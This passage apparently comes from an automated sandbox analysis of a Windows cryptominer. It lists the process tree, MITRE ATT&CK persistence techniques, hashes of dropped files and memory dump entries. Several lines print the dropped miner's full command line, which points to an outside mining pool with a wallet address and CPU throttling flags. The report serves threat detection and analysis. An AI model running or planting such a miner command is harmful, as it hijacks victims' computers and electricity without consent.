C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\SMB.exeFilesize
3.1MB
MD57b2f170698522cd844e0423252ad36c1
SHA1303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA2565214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA5127155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa
-
C:\ProgramData\X64.dllFilesize
85KB
MD5e0cba19ae05af38d683f0142b7830098
SHA1f11f76ab015eba86408d58df703c4924ecbcfce5
SHA2561b88b455ca4e3340749ab5a1aecb8540dc36deed61b8d8c7e83f75b40452254b
SHA51263d6390737462feb496373c15d363c1c43a6f8a82ba04c41afc49c473681391607afbdb9eae2cfcf460d55a1a0d640e951c1c6b717cab892ca3c47bf3ec77a51
-
C:\ProgramData\X86.dllFilesize
71KB
MD51714f5eea5939f5683d6a94fa9dee08f
SHA1def4a7c8cfa0db9aafdc4f29872dc916777b57fb
SHA256549c16048586a212e4f1d1b27411628a14b21defee427c1c48840024c8cbfd4f
SHA512c1a9143584f8ca9397c2a49ea130ea3dee37d984a66df740cd8de97ef7c12800edb72f306d0a135aee616e5a657b73b2a0f35a334e54ef0be71c230fc01655d2
-
C:\ProgramData\spreadTpqrst.exeFilesize
1.3MB
MD523d84a7ed2e8e76d0a13197b74913654
SHA123d04ba674bafbad225243dc81ce7eccd744a35a
SHA256ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c
-
memory/1100-218-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4452-10-0x000002BB86D40000-0x000002BB86D54000-memory.dmpFilesize
80KB
-
memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4452-8-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/6104-176-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB
-
memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmpFilesize
6.3MB